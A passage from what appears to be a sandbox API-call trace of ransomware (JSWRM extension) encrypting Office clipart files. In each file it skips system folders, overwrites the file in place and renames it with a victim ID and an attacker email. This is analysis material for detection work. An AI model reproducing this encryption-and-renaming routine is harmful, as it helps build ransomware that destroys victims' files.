CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0092.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02398_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.491] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7832) returned 1 [0092.491] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e90) returned 0x205850 [0092.492] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1e90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1e90, lpOverlapped=0x0) returned 1 [0092.493] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.493] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1e90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1e90, lpOverlapped=0x0) returned 1 [0092.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.494] CloseHandle (hObject=0x314) returned 1 [0092.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0092.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0092.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0092.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0092.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.494] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02398_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02398_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0092.495] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd24, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02400_.WMF", cAlternateFileName="")) returned 1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2=".") returned 1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2="..") returned 1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2="...") returned 1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2="windows") returned -1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2="recovery") returned -1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2="perflogs") returned -1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2="documents and settings") returned 1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2="system volume information") returned -1 [0092.495] lstrcmpiW (lpString1="NA02400_.WMF", lpString2="msocache") returned 1 [0092.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0092.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02400_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02400_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02400_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0092.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0092.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02400_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02400_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02400_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0092.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02400_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.496] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3364) returned 1 [0092.496] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd20) returned 0x23fc98 [0092.496] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd20, lpOverlapped=0x0) returned 1 [0092.512] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.512] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd20, lpOverlapped=0x0) returned 1 [0092.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.512] CloseHandle (hObject=0x314) returned 1 [0092.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0092.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0092.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0092.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0092.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0092.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.512] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02400_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02400_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0092.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.513] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2120, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02404_.WMF", cAlternateFileName="")) returned 1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2=".") returned 1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2="..") returned 1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2="...") returned 1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2="windows") returned -1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2="recovery") returned -1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2="perflogs") returned -1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2="documents and settings") returned 1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2="system volume information") returned -1 [0092.513] lstrcmpiW (lpString1="NA02404_.WMF", lpString2="msocache") returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0092.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02404_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02404_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02404_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0092.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02404_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02404_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02404_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02404_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.515] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8480) returned 1 [0092.515] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2120) returned 0x205850 [0092.515] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2120, lpOverlapped=0x0) returned 1 [0092.517] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.517] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2120, lpOverlapped=0x0) returned 1 [0092.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.518] CloseHandle (hObject=0x314) returned 1 [0092.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0092.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0092.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0092.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0092.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0092.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.518] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02404_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02404_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0092.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.519] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5080, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02405_.WMF", cAlternateFileName="")) returned 1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2=".") returned 1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2="..") returned 1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2="...") returned 1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2="windows") returned -1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2="recovery") returned -1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2="perflogs") returned -1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2="documents and settings") returned 1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2="system volume information") returned -1 [0092.519] lstrcmpiW (lpString1="NA02405_.WMF", lpString2="msocache") returned 1 [0092.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0092.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02405_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02405_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02405_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0092.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0092.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02405_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02405_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02405_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0092.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0092.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.520] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20608) returned 1 [0092.520] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5080) returned 0x24d210 [0092.521] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5080, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5080, lpOverlapped=0x0) returned 1 [0092.524] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.524] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5080, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5080, lpOverlapped=0x0) returned 1 [0092.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.524] CloseHandle (hObject=0x314) returned 1 [0092.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 